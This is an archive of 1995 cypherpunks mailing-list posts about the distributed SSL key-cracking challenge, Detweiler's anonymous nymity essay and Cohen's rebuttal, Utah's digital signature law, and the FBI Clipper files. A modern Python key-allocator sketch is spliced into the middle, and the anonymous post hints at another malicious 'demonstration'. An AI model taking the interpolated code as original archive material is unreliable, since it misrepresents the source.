common computer languages that don't take extensive measures to be
random) have?

It seems that there's a lot of fuss about getting very random numbers,
but unless the numbers produced by ordinary measures have very obvious
coincidences, maybe it's a big fuss about nothing...?

- -sq





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@digit.ee>
Date: Thu, 24 Aug 95 14:43:54 PDT
To: cypherpunks@toad.com
Subject: Re: SSL CHALLENGE: ALERT! probable misallocation of keys?
In-Reply-To: <13538.9508242114@exe.dcs.exeter.ac.uk>
Message-ID: <Pine.3.89.9508250018.A1207-0100000@digit.ee>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 24 Aug 1995 aba@atlas.ex.ac.uk wrote:

> What happens is that when it reaches FFFF, it'll start doling out yet
> unacked keys on the assumption that they were mistakes, or that they
> were slow machines, or WWW doled ones which the user forgot to ack.

Just a dumb question: when brutessl-brclient-brloop finds the key,
will it report it to the keyserver right away? What I mean is, can I just
start the brloops on my machines and log out, and not have to look at the
display all the time?

BTW how can I log brloop's output into a file and not to the screen?

Juri

<o       Jüri Kaljundi         e-mail: jk@digit.ee         o<
 >o                             tel: +372 6308994            o>
<o       DigiTurg               http://www.digit.ee/        o<
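
The key server behaviour aba describes in the quoted text above (hand out fresh segments up to FFFF, then start re-issuing the ones nobody has acked) is sketched below as an added example; it is not the challenge server's own code. The class, method names, client names and the tiny 8-segment demo space are all assumptions made for illustration.

```python
from dataclasses import dataclass, field

SEGMENT_COUNT = 0x10000  # segment ids 0000..FFFF, the range named in the quoted text


@dataclass
class SegmentAllocator:
    """Hypothetical coordinator: fresh segments first, then unacked ones again."""
    total: int = SEGMENT_COUNT
    next_fresh: int = 0                              # next never-issued segment
    issued_to: dict = field(default_factory=dict)    # segment -> list of clients
    acked: set = field(default_factory=set)          # segments reported as searched
    reissue_cursor: int = 0                          # scan position after the wrap

    def _next_segment(self):
        if self.next_fresh < self.total:
            seg = self.next_fresh
            self.next_fresh += 1
            return seg
        # First pass is over: walk the space again looking for unacked segments
        # (mistakes, slow machines, or WWW-issued segments never acked).
        for offset in range(self.total):
            seg = (self.reissue_cursor + offset) % self.total
            if seg not in self.acked:
                self.reissue_cursor = (seg + 1) % self.total
                return seg
        return None  # every segment has been acked

    def allocate(self, client, blocks=1):
        """Return up to `blocks` distinct segment ids for `client`."""
        out = []
        while len(out) < blocks:
            seg = self._next_segment()
            if seg is None or seg in out:
                break  # nothing left, or we lapped the remaining unacked set
            self.issued_to.setdefault(seg, []).append(client)
            out.append(seg)
        return out

    def ack(self, client, seg):
        """Record a 'searched, no key' report; reject acks for unissued work."""
        if client not in self.issued_to.get(seg, []):
            return False
        self.acked.add(seg)  # idempotent, so a late ack from a slow machine is fine
        return True

    def duplicated_work(self):
        """Segments handed to more than one client (possibly searched twice)."""
        return sorted(s for s, c in self.issued_to.items() if len(c) > 1)


def demo():
    alloc = SegmentAllocator(total=8)                # constructed small keyspace
    first = alloc.allocate("fast", blocks=4)
    alloc.allocate("slow", blocks=2)
    alloc.allocate("www-user", blocks=2)             # never acks
    for seg in first:
        alloc.ack("fast", seg)
    again = alloc.allocate("fast", blocks=4)         # space exhausted: re-issue
    late = alloc.ack("slow", 4)                      # slow machine finally reports
    bogus = alloc.ack("slow", 7)                     # never issued to "slow"
    return first, again, late, bogus, alloc.duplicated_work()


if __name__ == "__main__":
    print(demo())
```

Once the first pass ends, every unacked segment is a candidate for duplicate work, so the cost of re-issuing is bounded by how many clients take segments and never report back.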





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 24 Aug 95 18:02:38 PDT
To: trei@process.com
Subject: Re: SSL Challenge: Server problems
In-Reply-To: <9508250015.AA22053@toad.com>
Message-ID: <"swan.cl.cam.:020170:950825010219"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> I can't contact the server to request keyspace anymore - I get a 
> '500 Server error'

I take that to mean "the WWW server" ...

Well, it appears that the congestion has overcome it too !
Seems that cypherpunks hammer it even harder than its usual high traffic on
http://www.cl.cam.ac.uk/coffee/coffee.html
I think it's just been running out of process, etc ...
It's working OK for me now ...

> It looks like 12 hours on a P5/90 are going to waste (could have done
> 90 segments)

Try again ....


BTW: I tracked down the (well, at least one) cause of the "HELO COMM QUIT"
     sessions ... brclient 0.14 and brloop 0.5 should fix it. 
     If brloop is running, leave it ASIS (if it passes the "L" flag to
     brclient that is), but replace the brclient script. When the running
     brutessl finishes, the next one will use the new brclient.

     Could everyone who's around make this update to reduce the congestion ?
     Ta.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an366601@anon.penet.fi
Date: Thu, 24 Aug 95 20:00:56 PDT
To: cypherpunks@toad.com
Subject: The Theory of Nymity (value of True Names)
Message-ID: <9508250244.AA26841@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



the thread has been going around about the value of "true names".
this is a complex study of the value of "true names". it dissects
the issue and gets to the core of the matter. it suggests there
is a valuable *psychological* benefit to the use of true names
and that it may even be necessary for "honest communication"
in any "society".

those of you that argue that true names are irrelevant, why is
it that you are the same ones that try to "out" L.D. behind
whatever tentacle-of-the-moment he is hiding behind? do you 
really care, or don't you? actions speak louder than words!!

part of L.D.'s demonstrations were the harm that someone with
some ingenuity, flair, malice, and boredom could wreak on any 
cyberspatial community through the use of unrestrained 
anonymity/pseudonymity. and it appears that some of you still
don't get the point. perhaps another reminder or demonstration
is in order <g>



|   /\  |\| /~ L~            ``I have to spew this stuff, or I'd be on the
L_ /~~\ | | \_ L_             roof with a high power weapon.'' -Jim Carrey
http://www.csn.net/~ldetweil


===

The Theory of Nymity

Detweiler was the first to pioneer the "theory of nymity".  Observing
that various forms of anonymity and pseudonymity were blurred in the
popular consciousness and that the subject was awash with irrational
emotionalism and ill-defined terms, he sought to formalize and
crystalize the fundamental concepts and distinctions involved.

The cypherpunks definitely pioneered forms of nymity, and passionately
champion the general issue, particularly its ramifications in
cyberspace; however they refuse to confront the issue openly and
overtly, suggesting they perceive some sort of stigma or taboo
associated with their practices. They also refuse to contemplate
negative or potentially disastrous social effects of the associated
scenarios, asserting all forms of nymity are either indistinguishable
or essentially morally neutral practices that invariably extend the
rights of the individual in the face of the oppressive State or
massive corporations. They see all forms of nymity as merely one
unified hacksaw of the serf, useful and effective in cutting away
chains of bondage in the Sisyphean struggle for privacy.

Detweiler confronted the diverse implications of nymity by elevating
the subject of "nymity" to a study complete in itself. Abstracting
from his writings, Detweiler considered the concept of a "nym 
spectrum" involving the key concepts of receiver of a message,
sender, and identity. At various points on the nym spectrum, the
receiver has varying degrees of knowledge about the identity of the
sender.

In a Detweilerian model of nymity, an abstract communications space
exists in which messages and their identification can be dissociated
from their senders while still being directed at receivers. A set of
"formal senders" is juxtaposed or overlaid on top of the "actual
senders" analogous to the way formal and actual parameters in
structured computer programs are defined and related.

A "formal sender" is the labeled origination of a message sent by an
"actual sender", who may or may not be identified. The "formal
sender" may be identified in some way that is independent from the
"actual sender" identification. If an actual sender A is identified
as sender B in the message, B is the "formal identification" for the
sender whose "actual identity" is A.

Detweiler defined the various forms of nymity based on the knowledge
of the sender, say party C. This is his critical distinction that
cypherpunks denied, arguing that all the forms of nymity he saw a
difference between were really interchangeable and indistinguishable,
and therefore identical. They do not recognize any relevance of the
"knowledge" or mental state of the receiver in  regards to messages.
(In a sense the  philosophy is similar to behaviorism in asserting
the invalidity of internal mental state.)

A "true name" is defined as a situation where the message is
identified from the actual sender, e.g. message sender is identified
as "A" who actually sent it.

An "anonymous" message is a message with no identification whatsoever.
Detweiler sometimes called this "hit and run anonymity". There is no
attribution in the message to any sender, either formal or actual.
Entity "C" knows the message could be from anyone.

A "pseudonym" is defined as a situation where the message has an
identification, but the receiver is correctly aware that the
identification on the message is not the actual identification. I.e.
C receives a message labelled as originating from "B", but C knows
that "B" is a nym for some other party that *could be* (but not
*necessarily*) actually  identified as "A".

Detweiler defined "pseudoanonymity" as the blurred situation between
the anonymous and the pseudonymous message. The receiver C sees a
message as originating from "B", but C is not aware that "B" is a
formal nym that may actually identify some other party such as A.
Entity A is said to be "pseudospoofing" entity C.

The cypherpunks argue that there is in principle no difference between
Detweiler's "pseudoanonymity" and the classic "pseudonymity", stating
that anywhere there is an "actual" nym, a receiver cannot be sure it
is not really a formal one, and vice versa (i.e., any nym is
potentially a pseudonym or true name). In fact they say there is
fundamentally no distinction to be made between formal and actual
nyms.

The critical question is of course how "actual" and "formal" nyms
are defined. What does it mean to "identify" a sender with a nym?
Detweiler adapted to the ambiguities in the following way. He defined
the "actual nym" (or, interchangeably, the "true name") as an
identification for party A if for every context where an actual nym
applies, that party is identified as A. Call this the "actual nym
scenario".  The definition appears to be somewhat circular but he was
able to derive conclusions from the premise.

Suppose that a context was established in which the "actual nym"
scenario applied, and a message was identified as from "A". Then "A"
is the actual nym of the sender. Suppose that the context is not
"actual" (the converse will be considered the "formal") and the
message is identified as from B. If there is some  "additional
information" that B is a "true name",  then B is the actual sender,
and no other party sent the message (forms of the "additional
information" clause will be considered below). Otherwise no conclusion
can be made about the actual sender.

In general, in an "actual context" the actual sender is always the
formal sender. In a formal context, the actual sender is dissociated
from the formal identity of the message,  but "independent
information" may pinpoint the actual identity.

But the question of how the formal or actual context is established is
still unresolved. Detweiler suggested it would be based on the
declarations of the message. If the message "declared" it was from an
actual sender, the actual context applies. If there is no
declaration, the formal context is assumed.

Obviously contradictions can arise within these definitions if the
sender "lies". Detweiler simply observed that a logical theory could
be built up based on his premises from which  conclusions could be
drawn. Furthermore, there is the fundamental observation that in a
formal nymity system, "true" conclusions about actual identity can
only be derived from message contents  if participants "don't lie". A
core premise of the theory is  that an entity can express statements
such as "my true name is [x]" in the communication system. (This
is one form of the "additional information" clause above.)

The cypherpunks believe that if the communication system includes only
the formal context, there is no such thing as a "lie".  Detweiler
however maintained that as long as the actual system exists (or more
particularly the overlay of a formal system over an actual one), lies
can exist, although they may be undetectable within the formal
system. (In this sense it is analogous to a Godel Theorem for Nymity,
making an observation about a phenomenon that "exists" but  is
"undetectable" within the formal system, with the parallelism of
"mathematical" and "metamathematical" statements mapping to "formal"
and  "actual" communication systems.) 

The Detweiler Thesis

Detweiler had a preoccupation for considering the "community", which
is defined as a formal or actual context in which communication takes
place in both ways between a group of entities (i.e. entity A may be
a receiver of sender B and vice versa for all members of the group).
He explored the implications of both the formally and actually
identified communities, and consistently objected to the actual
identification scheme as at least uninteresting  and at most too
constraining, mirroring the quintessentially cypherpunkesque
position. However Detweiler diverged from the philosophy by
repeatedly emphasizing a basic premise, which is currently unprovable
speculation  much the same way that the  Church-Turing thesis is: in
a formally identified community system  where participants don't
"lie" about actual identity, the communication of the "community" is
of "higher quality".

A concrete example from everyday experience is that of book
publishing.  Some books may exist in a "formally identified"
community in which all the authors of the community agree to
associate their actual identity with the book (the "message"). Other
books may exist in a "formally identified" community in which authors
identify themselves other than with their "true names". Detweiler
asserted that a book could "lie" and state that it was to be taken in
the actual context (i.e. "A is the author of this book, and A is not
a pseudonym"). Cypherpunks denied there was such a thing as a  "lie"
in this context or even a "true name" in any context.  Essentially they
consider any statements in the message that refer to identity or its
formal vs. actual context as nonexistent, invalid, and/or 
meaningless.

Detweiler suggested that a "scientific community" was an example of a 
communications system dedicated to actual identities, or at least a
formal identification system where the occurrence of lying was minimal
and considered anomalous, and  that its "success" in achieving an
overall climate of "quality"  communication is partly due to the
convention.

Detweiler emphasized that it is not the case everyone must be actually
identified in the community to fulfill his thesis (which is expressly
about formal communities, not actual ones), only that parties in the
system "don't lie". The cypherpunks completely, either inadvertently
or deliberately,  misconstrue or obfuscate his position as asserting
that the formal context of nymity is never of "higher quality".
Actually, Detweiler frequently expressed an aversion to the actual
identity community and championed the formal context of communication
as an embodiment of privacy, just as the cypherpunks. But he diverged
from the cypherpunks by insisting that "lies exist" in the formal
context which they heatedly denied.

Another of Detweiler's observations was that not only were "lies" possible
in a formal communications system, but there were "worse lies" in
formal systems that embodied two-way community communication. An
example of  this is cyberspace, where a sender can ask questions of
the receiver such as "are you using a pseudonym?" or "are you
communicating under formal names other than [x,y,z]"? (These are
examples of the "additional information" clause above that
discriminates pseudonymity from pseudoanonymity.) He noted that
questions like these can be answered "truthfully" while at the same
time not necessarily divulging actual identities, a distinction
critical to the understanding of Detweilerian theories. The
cypherpunks either asserted that such questions were fundamentally
illegitimate and invariably deserved no answer by the receiver, or
even that any answer (including a "lie") was justified in response.

Detweiler observed that some formal identification systems have some 
other useful properties, such that "if [a] and [b] are different
formal names, [a] and [b] denote different entities". Or, "for all
formal names [a], there is a single entity actually identified as
[a]." Furthermore, in a community where  senders don't "lie", these
properties can actually be derived by  asking particular questions of
the senders. (The question of whether the receiver *must* answer
certain questions, or not at all, leads to additional ramifications.)
Detweiler's very critical observation, however, was that even though
there is additional "knowledge" about the uniqueness of identities in
these systems, the mappings of formal nyms to actual identities
cannot necessarily be derived.  This is the basis of his claim that
even if the entities in a formal system "don't lie", they don't
necessarily reveal their actual identities, and that this critically
desirable property of "privacy" is preserved.

The idea of a "true name" is a very problematic and perplexing 
concept in the same way that the concept of "absolute space" is
troubling to the theory of Newtonian mechanics, which Einsteinian
relativity sought to remove, starting with the premise that "there is
no preferred reference frame". The cypherpunks cite the absurdity of
the "true name" concept in an analogous argument and attempt to
discredit Detweilerian theories on this basis. However the theory is
not based on "true names" but the existence of "entities", hence this
cypherpunk position translated to its most basic form, becomes,
essentially, "unique communication sources (such as 'humans') don't
exist"  (or analogously in the Einsteinian metaphor, "mass and energy
do not exist").

In other words, assuming that "unique entities exist", and statements
about identity can be made in the communication system, it is
possible for entity A to say "my true name is 'C'" in one message and
in another "my true name is 'B'", a situation which would be 
considered a "lie"-- the significance of the reference to the entity
as "A" is irrelevant.  The "true name" of an entity A  is simply
defined as an arbitrary but unique nym which, if considered the
actual identity of A, would not contradict the statements of any of
A's messages (or replies to questions). 

Simply put, the "true name" has the property that if two derivations
in the form "[x] has true name [y]" and "[x] has true name [z]" can
be made from the meanings of [x]'s statements in [x]'s messages, then
y = z. Hence, if entity [x] simultaneously states  "my true name is
[y]" and "my true name is [z]" in any messages (the receiver is
irrelevant) and y != z, then entity [x] is "lying".

The essence of the idea of "true identification" is that there is a
one-to-one mapping between "entities" and "true names". The
representation of the "true name" is irrelevant. Detweiler certainly
did not make the absurd claim that a "true name" had any special
syntactic properties. He also did not claim that "true name
registries" had to be erected to provide the feature, although they
could support it. At the core of the concept is the idea that every
entity in a "truthful" system must make a choice as to their actual
name identification and not "lie" about its properties in messages
that refer to it. 

The cypherpunks ruthlessly ridiculed this concept of communication
explicitly involving "trust" and "honesty" between participants. One
famous objection was that "that which cannot be enforced should not
be prohibited". That is, if the unique mapping of true names to
actual entities was not a precise, mathematical certainty, it
effectively does not exist. Hence the cypherpunks generally base
their model of the reality of communications on fundamentally
different premises than Detweiler which reject the existence of the
concept of "truthfulness".

Detweiler countered by suggesting that communities with communications
based on trust and honesty and the contrary not only both exist, but
that discrepancies between the two probably existed as well and
furthermore were worthy of study. (Again, he conjectured that the
"dishonest" communications forums led to "disharmony" without further
defining the term.) All these distinctions lie in the area Detweiler
denoted under the heading "morality" which again the cypherpunks
generally deny exists in an abstract communications system.

Hence the key formal ideas of the overall theme that communications
systems could lead to significantly different scenarios based on the
"honesty" or "truthfulness" of members of a community with respect to
identity had been addressed for the first time by Detweiler, but at
great cost to Detweiler's credibility within the cypherpunk circles,
which have rebuffed, ridiculed, and excommunicated him. Detweiler
tended to take this as evidence that the core cypherpunk philosophy
was not about seeking privacy, which he went to pains to demonstrate
existed in his "honest" systems, but rather a sort of denial of the 
existence of morality in cyberspace-- that the question of "whether a
message 'lies' about its author's identity" is inherently
meaningless, a premise he strongly rejected.

The Sociology of Cypherpunkism

Detweiler went far beyond theoretical study in his research of these
areas of Nymity. He considered the cypherpunk beliefs in these areas
worthy of a systematic sociological survey because of the apparent
taboos and stigmas the cypherpunks apparently associated with some of
their positions, either applied by themselves or that they perceived
were held by others. He found they were reluctant to reveal their
true beliefs on the subject and consistently refused to answer even
vague questions like "how many pseudonyms are you using? are you
using any at all? do you think forums where  pseudonyms are not used,
by agreement of participants, are desirable or  could have superior
quality?"

Detweiler believed he had found signs the cypherpunks actually have
very complex beliefs, practices, and techniques in the areas of
identity subterfuge which they refuse to reveal except to fellow
"insiders", something like an elaborate secret religion or unorthodox
sexual practice. For Detweiler, cyberspace and cypherpunkism are a 
microcosm of the way that humanity seems to mix the concepts of
accountability, morality, and identity in an intricate, tangled,
inscrutable web, a place where the ideas of "candor" vs. "privacy"
are viscerally manifested.

Detweiler often observed the interplay between "true name,
pseudonymous, and anonymous"  messages was somewhat analogous to the
Freudian concept of the dance between the superego, ego, and the id,
or formal vs. actual identification systems like the subconscious vs.
the conscious awareness. (He once even compared pseudospoofing
scenarios to demonic possession and multiple personality disorders.)
Perhaps his most  relentless and enduring theme was that nymity
issues are an area inherently worthy of serious or even intense
scientific inquiry because they lie at the core  of human society and
interactions.

The Detweilerian distinctions are very critical in understanding the
cypherpunk philosophy and the schism with conventional morality he
claimed it embodied.  Essentially the cypherpunks assert "lies about
identity don't exist in cyberspace". Detweiler argued not only that
"lies about identity in cyberspace exist", but further claimed that
"lies about identity diminish the quality of communications within
the community" and that "privacy is not necessarily  compromised by
honesty". However his position is often erroneously lampooned by the
cypherpunks as a ridiculously (but hilariously)  distorted
caricature such as "true name identification should be enforced by
strict laws of the State because pseudonyms are inherently evil" 
when in fact his distinctions, conclusions, and claims are far more
sophisticated and subtle. 

Whether the Detweiler Thesis asserting "superior quality communication
in honest formal identification systems" can ever be demonstrated,
and whether the unrecognizably distorted portrayals of his theories
by the  cypherpunks are deliberate or due to the inherent
incomprehensibility of the concept to peculiar brain anatomies, are
the key, unresolved,  "open" questions and matters of further
research in the study of the sociology of cypherpunkism and the
theory of Nymity.


----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Fri, 25 Aug 95 02:52:36 PDT
To: cypherpunks@toad.com
Subject: DigSig laws
Message-ID: <199508250951.DAA13176@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Being a resident of Utah, I was interested in exactly what Utah's digital
signature law was about. I knew it had to be somewhat level-headed, since
a number of people in little silicon valley must have had their fingers in
it... Unfortunately, IANAL for me is more than just a legal disclaimer.
Anyone know if any of the legal eagles (i.e., judge-l, eff, etc.) have
analyzed it, or know of any summaries that my search didn't find? (I was
lucky to find this link in the first place...)

Here is the Utah law:

gopher://gopher.utah.edu/11/Off%20Campus%20Information/State%20of%20Utah/
Utah%20Legislative%20Bills/1995

(I had to manually gopher it, it's under search bills, it's SB0082)

Or perhaps any of you IANAL types would care to try reading it...it sounded
like the key had to be escrowed with a legally recognized agent.


PS: my compliments to Damien. Oh, I mean, the SSL crack looked nice
leading the SF Chronicle's Business headline, but I'm especially thrilled
the way the Signal/Noise ratio suddenly improved overnight. It will make
reading what happened during my vacation much more interesting from that
point on... And for those of you who think that PROMIS is squarely
on-topic, <PLONK!>. When I can get grep routing results to /dev/null for
"whitewater", etc, I'll be sure to share.. 

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMDwC48La+QKZS485AQHnnQL9FllVv82m5a0bl0xg5einnt3KR2X4FhPj
jdTMiWeCPRW6H84/GWzPdhcHrn0ilvtgnwZTYqaL+1KS6wuPkuMcjOLw8VgxLmO9
CyUAee/zipkTyPnSPlgYp5Nvw0vm+gFn
=qurO
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Fri, 25 Aug 95 02:08:56 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: FBI Files on Clipper Release
In-Reply-To: <9508232014.AA18754@cs.umass.edu>
Message-ID: <Pine.D-G.3.91.950825045109.18777D-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 23 Aug 1995, Futplex wrote:

> A FBI document reads:
> # To ensure that this occurs, legislation mandating the 
> # use of Government-approved encryption products or 
> # adherence to Government encryption criteria is required.
> 
> Ex-AAG Jo Ann Harris told a Senate Judiciary Subcommittee in 1994:
> $ we have absolutely no intention of mandating private use of a particular
> $ kind of cryptography, 
> 
> I ranted:
> % Just what real legal recourse do we have against lying scum in the
> % bureaucracy ?  
> 
> Brian Davis writes:
> > You sure are anxious to prosecute government officials.  
> 
> You're damn right I'm anxious to prosecute government officials who appear
> to have willfully lied about public policy in testimony before Congress !

You must realize that there can be a difference between what agencies say 
is necessary and what policy ultimately becomes on that issue.  It is 
because of that distinction that campaigns, such as the ongoing campaign 
to allow exportation of strong encryption software, are important.  The 
FBI may say they want X, but the policymakers may take the FBI's 
arguments (always with a grain, or a bucket, of salt), consider other 
agencies views, public opinion, the persuasiveness of everyone's 
reasoning, and *then* adopt a policy that satisfies no one completely.
 
> For representative democracy to be even vaguely democratic at all, the 
> representatives need to level with their constituents as much as possible.
> I certainly intend to hold public officials speaking in an official 
> capacity about official business to a high standard of conduct.  

As you, and we all, should.  That doesn't mean prosecution necessarily.  
It may mean private protest (letter to Clinton, Reno, et al.), public 
protest, voting the bastards out, etc.


> > What is untrue about her statement.  Maybe she meant it's OK to use 
> > ROT-13 but nothing else ... 
> > How could that be compatible with "no intention of mandating...a
> > particular kind of cryptography" ?

> > > And you guys complained about the Jake Baker prosecution! 

> > Non-sequitur. How is the Baker case relevant to this ? 

I disagree that it is a non sequitur.  

Baker indicted for speech which, to some, constituted a threat.

You seek to prosecute former AAG Harris for speech which, to some, was a lie.

> > -Futplex <futplex@pseudonym.com>
> > "Say goodbye to the clowns in Congress" -Elton John/Bernie Taupin
> 

Sorry I didn't respond sooner -- email got backed up and I'm not reading 
chronologically (for some unknown reason).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 25 Aug 95 04:23:52 PDT
To: an366601@anon.penet.fi
Subject: Re: The Theory of Nymity (value of True Names)
In-Reply-To: <9508250244.AA26841@anon.penet.fi>
Message-ID: <9508251117.AA13712@all.net>
MIME-Version: 1.0
Content-Type: text


> |   /\  |\| /~ L~ anonymously spewed forth
> L_ /~~\ | | \_ L_ as follows:
> 
> The Theory of Nymity
> 
...
> The cypherpunks definitely pioneered forms of nymity, and passionately
> champion the general issue, particularly its ramifications in
> cyberspace; however they refuse to confront the issue openly and
> overtly, suggesting they perceive some sort of stigma or taboo
> associated with their practices.

They seem to be openly confronting the issue to me.  There is a stigma
attached to anonymity - haven't you seen the Lone Ranger?  If you're
honest, why do you wear a mask?

> They also refuse to contemplate
> negative or potentially disastrous social effects of the associated
> scenarios, asserting all forms of nymity are either indistinguishable
> or essentially morally neutral practices that invariably extend the
> rights of the individual in the face of the oppressive State or
> massive corporations.

I think they contemplate the issues.  I think that most of them (us?)
realize that:

	They are the ones likely to be most harmed by a lack of open and
	honest communication. 

	By identifying themselves they might open themselves to undue
	risk of harm in the form of harassment, arrest, search and
	seizure of personal property, etc.

	The only way they can both help preserve individual freedom for
	others and remain free themselves is by saying some things
	anonymously.

> They see all forms of nymity as merely one
> unified hacksaw of the serf, useful and effective in cutting away
> chains of bondage in the Sisyphean struggle for privacy.

They certainly see the advantages over the disadvantages.

> Detweiler confronted the diverse implications of nymity by elevating
> the subject of "nymity" to a study complete in itself. Abstracting
> from his writings, Detweiler considered the concept of a "nym 
> spectrum" involving the key concepts of receiver of a message,
> sender, and identity. At various points on the nym spectrum, the
> receiver has varying degrees of knowledge about the identity of the
> sender.

There are times when identity is important, and there are times when it
is not.  Identity is not important when disclosing a danger - if you
yell "FIRE!!!" in a burning building, nobody is going to say "Hold on
there...  before I get out, what's your name and address, and how can
you prove that you are who you are?" They recognize the danger you
identified and get out of the building.  When I buy a can of fruit juice
from the local store and pay with cash, if they ask my name and address,
I tell them (politely) to stuff it.  You don't need to know my identity
to trade a fungible for goods or services.  That "need to know" phrase
is important here.  Identity is only important to reveal if there is a
legitimate need to know it, and if that need to know outweighs the risks
associated with the knowledge.

...
> Detweiler defined the various forms of nymity based on the knowledge
> of the sender, say party C. This is his critical distinction that
> cypherpunks denied, arguing that all the forms of nymity he saw a
> difference between were really interchangeable and indistinguishable,
> and therefore identical. They do not recognize any relevance of the
> "knowledge" or mental state of the receiver in  regards to messages.
> (In a sense the  philosophy is similar to behaviorism in asserting
> the invalidity of internal mental state.)

I think the cypherpunks recognize that by being anonymous they risk
their message being taken less seriously, but they are willing to take
the risk because most people on this list seem to evaluate the content
of the message more than the sender anyway.  Contrast this list to other
lists and you will see far fewer personality issues here because, in
part, the moderator doesn't inject his/her personality into the
discussion all the time. 

...
> The cypherpunks argue that there is in principle no difference between
> Detweiler's "pseudoanonymity" and the classic "pseudonymity", stating
> that anywhere there is an "actual" nym, a receiver cannot be sure it
> is not really a formal one, and vice versa (i.e., any nym is
> potentially a pseudonym or true name). In fact they say there is
> fundamentally no distinction to be made between formal and actual
> nyms.

No - perhaps some of the cypherpunks would argue that, but certainly
not most.  Many cypherpunks use pseudonyms and we trust them to some
extent because of the repeated usage of the pseudonym.

> The critical question is of course how "actual" and "formal" nyms
> are defined. What does it mean to "identify" a sender with a nym?
> Detweiler adapted to the ambiguities in the following way. He defined
> the "actual nym" (or, interchangeably, the "true name") as an
> identification for party A if for every context where an actual nym
> applies, that party is identified as A. Call this the "actual nym
> scenario".  The definition appears to be somewhat circular but he was
> able to derive conclusions from the premise.

Hogwash.  A rose by any other name would smell as sweet.  Names are just
conveniences created as a part of language because we are able to use
nouns to identify objects.  That guy who runs all.net is just as good as
Fred Cohen in terms of identifying me, and I rarely use my full name,
and there are other people in the world with exactly the same full name
as mine - even including the Dr. (a mathematician I believe).

> Suppose that a context was established in which the "actual nym"
> scenario applied, and a message was identified as from "A". Then "A"
> is the actual nym of the sender. Suppose that the context is not
> "actual" (the converse will be considered the "formal") and the
> message is identified as from B. If there is some  "additional
> information" that B is a "true name",  then B is the actual sender,
> and no other party sent the message (forms of the "additional
> information" clause will be considered below). Otherwise no conclusion
> can be made about the actual sender.

A lot of conclusions can be made about the sender based on the content
and context of the message. 

> In general, in an "actual context" the actual sender is always the
> formal sender. In a formal context, the actual sender is dissociated
> from the formal identity of the message,  but "independent
> information" may pinpoint the actual identity.
...
> Obviously contradictions can arise within these definitions if the
> sender "lies". Detweiler simply observed that a logical theory could
> be built up based on his premises from which  conclusions could be
> drawn. Furthermore, there is the fundamental observation that in a
> formal nymity system, "true" conclusions about actual identity can
> only be derived from message contents  if participants "don't lie". A
> core premise of the theory is  that an entity can express statements
> such as "my true name is [x]" in the communication system. (This
> is one form of the "additional information" clause above.)

Baloney.  If someone claims to be me (likely a masochist) and I am
listening, I can identify it for all to see.  As long as the society
doesn't tolerate excessive amounts of this and fights back against the
lack of integrity, it is likely that any person who does this will be
detected.  The point here is that identity in the form of a name is only
a tag we attach for convenience of associating actions with individuals. 
It doesn't matter what the name is - I don't know the real name of
HOBBIT, but I know that s/he says a lot of sensible things. 

> The cypherpunks believe that if the communication system includes only
> the formal context, there is no such thing as a "lie".  Detweiler
> however maintained that as long as the actual system exists (or more
> particularly the overlay of a formal system over an actual one), lies
> can exist, although they may be undetectable within the formal
> system. (In this sense it is analogous to a Godel Theorem for Nymity,
> making an observation about a phenomenon that "exists" but  is
> "undetectable" within the formal system, with the parallelism of
> "mathematical" and "metamathematical" statements mapping to "formal"
> and  "actual" communication systems.) 

Lies are relative things, not absolutes.  There is no "actual" system
and there never was.  Detweiler assumes that the way s/he identifies
people is the "actual" system, but that's only one perspective.  Many of
us have grown up knowing about more than one system of identities, and
apparently Detweiler missed this one.

> The Detweiler Thesis
> 
> Detweiler had a preoccupation for considering the "community", which
> is defined as a formal or actual context in which communication takes
> place in both ways between a group of entities (i.e. entity A may be
> a receiver of sender B and vice versa for all members of the group).
> He explored the implications of both the formally and actually
> identified communities, and consistently objected to the actual
> identification scheme as at least uninteresting  and at most too
> constraining, mirroring the quintessentially cypherpunkesque
> position. However Detweiler diverged from the philosophy by
> repeatedly emphasizing a basic premise, which is currently unprovable
> speculation  much the same way that the  Church-Turing thesis is: in
> a formally identified community system  where participants don't
> "lie" about actual identity, the communication of the "community" is
> of "higher quality".

The first error is usually the basic assumption.  This one is not a very
accurate reflection of the reality that many of us in the world live in
today.  The fact is, our political system is full of people who use one
and only one identity and have done so for their entire lives, and yet
it is jam packed with lies and crude (as well as sophisticated) attempts
at tricking people with communications.  The cypherpunks, who have far
more uses of pseudonyms have far fewer deceptions and far better
communications in my experience.  Many things that cannot be proven
are actually false.  This counterexample demonstrated that Detweiler is
not just unprovable, s/he is wrong.

...

All of the confirmations Detweiler may be able to come up with can't
overwhelm the one counterexample just cited, however, I can cite many
more counterexamples.  By the way, counter to Detweiler's proposition,
plenty of scientists lie about results, and many University professors
who claim to be scientists lie about the true state of their work so
that they can propose research grants that are certain to be successes
(it is a common practice to propose work you have already completed so
as to assure that you will be successful and thus get the next grant). 

...
